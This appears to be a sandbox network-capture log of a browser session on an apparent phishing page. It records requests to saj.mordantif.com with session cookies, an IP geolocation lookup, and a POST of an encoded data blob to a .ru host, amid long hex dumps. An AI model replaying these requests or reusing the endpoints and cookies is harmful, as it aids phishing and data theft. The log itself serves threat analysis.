                                                        2024-09-13 13:07:11 UTC1369INData Raw: 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
                                                        2024-09-13 13:07:11 UTC1369INData Raw: 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04 08 10 20 40 80 00 01 02 04
                                                        Data Ascii: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        78192.168.2.549829104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:11 UTC1130OUTGET /rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:11 UTC669INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:11 GMT
                                                        Content-Type: image/svg+xml
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Content-Disposition: inline; filename="rsc29PUGZXGytlZ4a12Ib7SKJKCK2VqFWGPhMrghtk1NENcQADfU8gfkOTDnYef200"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=51WJvNX0w3iN7l5tM9D%2FbN4%2BuU9isBNRC1Su3hvgFDEIfzR222GijAftvt2JrpYlWlh26cMhZpdQ1uWIyO8j55yp6FIGCmLRsHXvXAIjHUl2I7N%2Bv2zIhJ4zrX6nfA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bda6baf17a5-EWR
                                                        2024-09-13 13:07:11 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                        Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                        2024-09-13 13:07:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        79192.168.2.549830172.67.70.2334433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:11 UTC350OUTGET /v1/ip/geo.json HTTP/1.1
                                                        Host: get.geojs.io
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:11 UTC907INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:11 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-request-id: d1e0205e44e5ac8a09c4e22d3354089b-ASH
                                                        strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                        access-control-allow-origin: *
                                                        access-control-allow-methods: GET
                                                        pragma: no-cache
                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                        geojs-backend: ash-01
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5g26qKjotsa82X2Dvz2wAXZsp%2BOw9hA5b2xXUMUV65X56cyeXONAlO8kj8jbhN1uTE3RTZ4LaLSvtn40LSGSXN2FpnhXnP2B4hbDZLiD9K%2BTAdNpIcVPzf6CTmUTGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        X-Content-Type-Options: nosniff
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bda680f1967-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:07:11 UTC332INData Raw: 31 34 35 0d 0a 7b 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65
                                                        Data Ascii: 145{"accuracy":20,"ip":"8.46.123.33","timezone":"America\/New_York","organization":"AS3356 LEVEL3","asn":3356,"city":"New York","area_code":"0","organization_name":"LEVEL3","country_code":"US","country_code3":"USA","continent_code":"NA","country":"Unite
                                                        2024-09-13 13:07:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        80192.168.2.549835172.67.179.1344433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:11 UTC736OUTPOST /mcrnzgbukewizymfphpkvhpbdNTtqWTUKJKTWGNEVFPTXALIOMOEGHBDCPCMKMAPGJRGAJFMEAETHXYQQADDRrsZugH7WwfW12wPwx40 HTTP/1.1
                                                        Host: fipyf.orpkf.ru
                                                        Connection: keep-alive
                                                        Content-Length: 125
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        Accept: */*
                                                        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://saj.mordantif.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:07:11 UTC125OUTData Raw: 64 61 74 61 3d 61 63 66 37 70 32 78 45 43 4b 54 4d 69 5a 67 78 5a 76 49 4b 43 4b 68 4d 4c 25 32 42 4b 4c 30 62 54 34 35 4c 79 4d 61 47 61 58 61 7a 30 75 56 44 64 74 6f 25 32 46 65 75 76 4f 51 67 62 78 31 7a 42 4d 25 32 42 56 57 56 33 43 48 25 32 42 53 73 71 49 6a 56 4b 42 7a 75 68 62 41 25 32 46 30 72 35 54 58 39 64 56 70 6b 50 6d 6e 36 68 77 34 7a 59 79 61 57 55 25 33 44
                                                        Data Ascii: data=acf7p2xECKTMiZgxZvIKCKhML%2BKL0bT45LyMaGaXaz0uVDdto%2FeuvOQgbx1zBM%2BVWV3CH%2BSsqIjVKBzuhbA%2F0r5TX9dVpkPmn6hw4zYyaWU%3D
                                                        2024-09-13 13:07:12 UTC648INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:12 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Content-Length: 408
                                                        Connection: close
                                                        vary: Origin
                                                        access-control-allow-origin: https://saj.mordantif.com
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ucv8Y2OmWjpZXTPdMJbpUboKa1x8TUaW2QKnhX%2FXSMTl1WZY2zr4gdDqivxkb1NKIEfYWfVfr%2B%2BQZu19mOIK%2F%2FVWNl58yyO5qORuhExZc%2FOuA%2FoPZSn4sSMjUSVqDjRJfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c285bdd69ef436c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:07:12 UTC408INData Raw: 2b 70 64 4c 71 42 52 79 6f 61 46 67 31 30 67 59 68 2b 51 43 31 35 69 7a 66 30 71 34 34 68 76 4d 4b 55 74 59 57 36 2b 37 75 56 71 6c 31 4e 59 4a 38 61 71 58 66 43 6a 4d 38 42 4c 72 59 4f 6a 63 53 7a 65 33 71 70 69 2b 74 45 7a 43 45 58 41 43 67 2f 53 39 52 62 32 31 35 30 4a 70 48 4c 6c 53 58 43 36 73 34 56 79 30 36 49 55 6a 70 4a 2f 62 62 2f 7a 53 30 62 5a 2f 62 73 39 47 48 72 2b 30 2b 37 48 44 52 78 68 76 39 2f 33 77 41 64 6b 35 58 69 57 52 43 4e 75 4d 62 57 58 7a 44 64 4c 55 32 65 47 71 43 50 59 65 6f 71 6d 71 41 32 39 65 44 6b 66 66 51 31 49 39 77 57 31 42 77 62 70 64 46 4d 4c 74 7a 77 43 4a 75 4e 58 36 66 77 49 41 33 4b 65 36 79 70 65 4d 6a 71 45 79 6e 32 41 59 63 44 37 35 30 57 74 79 6e 46 59 67 2b 76 53 76 48 39 59 4c 78 53 6f 5a 44 57 59 31 57 52 58
                                                        Data Ascii: +pdLqBRyoaFg10gYh+QC15izf0q44hvMKUtYW6+7uVql1NYJ8aqXfCjM8BLrYOjcSze3qpi+tEzCEXACg/S9Rb2150JpHLlSXC6s4Vy06IUjpJ/bb/zS0bZ/bs9GHr+0+7HDRxhv9/3wAdk5XiWRCNuMbWXzDdLU2eGqCPYeoqmqA29eDkffQ1I9wW1BwbpdFMLtzwCJuNX6fwIA3Ke6ypeMjqEyn2AYcD750WtynFYg+vSvH9YLxSoZDWY1WRX


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        81192.168.2.549838104.21.55.1244433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:07:12 UTC1126OUTGET /qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232 HTTP/1.1
                                                        Host: saj.mordantif.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: XSRF-TOKEN=eyJpdiI6InhlRjF0OEtYc3Q5N2Z1OCtXemFaYVE9PSIsInZhbHVlIjoiOUVudzZJN1ZBcHZGREV0VHZQU1FLM3d0TVViRkNpTERMaUdySGNiRnIwUDdoejhQT2hwS250eEV0VGs4MHNsak5nbjF1SmdXOHhXSVlqdUpqMmtjbUM3N21XQ2EvYXB3TnJ1THZEeTdFc0Z6N2M4TFcxYkM3RUhHTmE2Ym9zVFkiLCJtYWMiOiIwMDIwMzBiYTc4YWQzZTA2OWE0NTgzMjk1NDJkMjVhNWVkN2M0ZjlmMDVkNGIyYjk2MDhjY2VkYTRkM2Q2ODhjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlkanJBa2VXSWdiTER3ZFQ1dXBqUEE9PSIsInZhbHVlIjoiYkt6MU1TSm1yMzROakJlNGsyV3UvVkZiMkdvem12c0F0OGhDMXNlUFBwTmV1L2RxREpFZVArQnc5eVhDUEtJWVVPZ3JDb2N2TFJLY0I2Q2cyTjBULzVnRWRBUEM5RytBN1V6ZFlhUWs0UnF4ZHA4MFp1KzZCNEs5cjczQVZxd3EiLCJtYWMiOiJiNzYyNDY3Yjg3MTNjNDYyODk3M2FlNjRmM2FmZDk4YTlkYTE1NWZiMjI1N2ZkZGViM2M3MTI3NjEwMzVmODliIiwidGFnIjoiIn0%3D
                                                        2024-09-13 13:07:12 UTC656INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:07:12 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 29796
                                                        Connection: close
                                                        Content-Disposition: inline; filename="qrtYRSgbZwoFpIqsLsfaAAaMTEuvAUUa35gDNR7WsJOYdNceg3Q1Y76AWcd232"
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JdwqgOI5vlTW4EuTwyHUgGx1uCVxNgNs0J%2B9%2BrsYk6JxZcc8En92%2F7rMQOkWqoypcZgGSn13uZsou9iQDZYHOHHXVv76IgAAzHI7vuEtpdncSan7FWWximZbHNFOKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        alt-svc: h3=":443"; ma=86400
                                                        Server: cloudflare
                                                        CF-RAY: 8c285be29dad7ced-EWR
                                                        2024-09-13 13:07:12 UTC713INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 fa 00 00 01 2f 08 06 00 00 00 ad e6 03 d5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec 5d 07 58 53 49 17 3d 88 20 4d b0 80 14 11 54 b0 60 03 b1 8b 58 10 c5 de c5 82 bd ae 7d 7f 5d fb ae 7d ed ab ae ae ae 65 d7 ae 6b ef 1d 7b af 28 2a 56 ec a2 a0 82 82 60 a1 f8 fe 6f 26 10 13 29 69 2f c9 cb cb cc f7 c5 48 32 73 e7 de 73 ef 9b 93 79 6f e6 8e 09 58 61 08 30 04 18 02 0c 01 86 00 43 40 b4 08 98 88 d6 32 66 18 43 80 21 c0 10 60 08 30 04 18 02 60 44 cf 82 80 21 c0 10 60 08 30 04 18 02 22 46 80 11 bd 88 9d cb 4c 63 08 30 04 18 02 0c 01 86 00 23 7a 03 8b 81 b0 1b e1 dc a1 83 07 10 15 15 85 d7 af 5e e1 d5 ab 57 f8 f6 ed 1b 0a 17 76 45 61 d7 c2 28 52 c4 0d d5 ab 57 87 6f a5 4a c8 6b
                                                        Data Ascii: PNGIHDR/sRGB IDATx^]XSI= MT`X}]}ek{(*V`o&)i/H2ssyoXa0C@2fC!`0`D!`0"FLc0#z^WvEa(RWoJk
                                                        2024-09-13 13:07:12 UTC1369INData Raw: 16 2b 86 62 c5 8a a1 48 91 22 70 2d 52 04 4e 85 1c 58 ec 68 ec 15 26 80 21 c0 10 60 08 68 1f 01 36 58 f3 80 f1 b0 9f 7f e6 8e 86 86 f2 20 e9 bb 08 33 33 73 0c 1d 3b 59 a9 e7 f1 39 75 1c 11 1e 86 63 07 77 23 ee dd 5b 5e f5 73 75 75 85 9b bb 3b 25 fe 0a de de a8 57 2f 00 76 79 6d 58 3c f1 8a 32 13 c6 10 60 08 30 04 34 47 80 0d cc 1a 62 78 f7 fe 03 ae 43 fb 76 72 2b dc 35 14 49 9b 07 b5 68 87 1a b5 03 d4 12 95 92 9c 8c f0 b0 cb 38 7f 22 14 71 b1 fc 12 7c 76 0a 11 e2 af 5b 2f 00 f5 ea d5 43 f5 6a 55 59 5c a9 e5 39 d6 88 21 c0 10 60 08 f0 8f 00 1b 90 35 c4 74 c9 df 4b b9 c5 7f 2d a2 52 1a 34 68 88 05 0b e6 ab 85 69 f8 cd 5b 5c e7 4e 1d a9 9c 3c 79 2c 30 6a ca 6c 95 9f cb 47 bf 7a 89 db 37 ae e1 c6 95 0b 48 fc 98 90 a5 65 e6 e6 79 e0 e8 52 18 4e 2e ae 28 5c a4
                                                        Data Ascii: +bH"p-RNXh&!`h6X 33s;Y9ucw#[^suu;%W/vymX<2`04GbxCvr+5Ih8"q|v[/CjUY\9!`5tK-R4hi[\N<y,0jlGz7HeyRN.(\
